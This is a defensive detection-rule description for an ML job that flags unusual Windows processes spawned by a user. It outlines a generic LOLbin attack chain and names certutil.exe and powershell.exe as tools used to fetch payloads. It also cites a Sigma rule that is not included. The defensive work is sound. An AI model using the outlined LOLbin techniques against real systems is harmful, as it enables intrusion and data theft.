Unusual Process Spawned by a User Detected via Machine Learning

This rule leverages machine learning to identify unusual process execution patterns on Windows systems. It uses the “problem_child_rare_process_by_user_ea” machine learning job to detect processes that are both predicted to be malicious by a supervised model (ProblemChild) and considered unusual based on the user context by an unsupervised model. This approach aims to identify potentially malicious activity, including the use of LOLbins (Living Off The Land binaries), that might evade traditional signature-based detections. The rule is designed to work with data collected by Elastic Defend or Winlogbeat and requires the Living off the Land (LotL) Attack Detection integration to be installed and configured. The integration focuses on identifying defense evasion tactics employed by adversaries.

Attack Chain

1. Initial Access: An attacker gains initial access to a Windows system through various means (e.g., phishing, exploiting a vulnerability).
2. Privilege Escalation (Optional): The attacker may attempt to escalate privileges to gain higher access levels on the system.
3. Defense Evasion: The attacker leverages LOLbins (e.g., certutil.exe, powershell.exe) to execute malicious commands or download payloads, blending in with legitimate system activity.
4. Process Execution: The attacker spawns a process using a LOLbin within an unusual user context, making it harder to detect with conventional rules.
5. Command and Control (Optional): The spawned process establishes a connection to a command-and-control server for further instructions or data exfiltration.
6. Lateral Movement (Optional): The attacker moves laterally to other systems on the network, using the compromised system as a pivot point.
7. Data Exfiltration (Optional): The attacker exfiltrates sensitive data from the compromised system or network.
8. Persistence (Optional): The attacker establishes persistence to maintain access to the system even after a reboot.

Impact

A successful attack using LOLbins can lead to a variety of negative outcomes, including data theft, system compromise, and disruption of services. While this specific rule has low severity and risk score of 21, the underlying techniques can be part of a larger, more damaging attack. The focus on unusual process execution in user contexts is valuable for catching advanced persistent threats (APTs) or insider threats that have already bypassed initial security layers.

Recommendation

• Ensure the Living off the Land (LotL) Attack Detection integration is installed and configured correctly, including the “problem_child_rare_process_by_user_ea” machine learning job as outlined in the setup instructions.
• Enable Windows process events collection using Elastic Defend or Winlogbeat, as specified in the setup section.
• Deploy the Sigma rule below to detect unusual process execution involving LOLbins based on command-line arguments, focusing on processes spawned by users in unexpected contexts.
• Review the triage and analysis steps in the rule’s note section to effectively investigate alerts and minimize false positives.